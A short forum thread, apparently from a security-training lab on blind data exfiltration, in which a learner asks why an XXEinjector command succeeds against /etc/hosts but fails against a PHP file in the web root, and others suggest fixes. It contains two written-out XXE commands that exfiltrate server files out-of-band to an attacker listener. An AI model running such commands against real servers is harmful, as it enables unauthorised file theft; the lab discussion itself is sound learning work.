Web Attacks - Blind Data Exfiltration

Hi, guys

I’m stuck here:

ruby XXEinjector.rb --host=10.10.14.61 --httpport=8000 --file=/tmp/xxe.req --path=/etc/hosts --oob=http --phpfilter – Works

ruby XXEinjector.rb --host=10.10.14.61 --httpport=8000 --file=/tmp/xxe.req --path=/var/www/html/blind/327a6c4304ad5938eaf0efb6cc3e53dc.php --oob=http --phpfilter – Doesn’t work

I think the problem is the PATH: “/var/www/html” is NOT the real path on the remote server. Any suggestions?!

Thank you in advance!

Hey! I don’t know if you have already figured this one out or not, but I just wanted to say your post helped me figure out what I was doing wrong. :slight_smile:

Anyway - try the attack again but with just the file, not the whole path.

Changing the path is a good idea, but I can’t receive data, even “/etc/hosts” :rofl: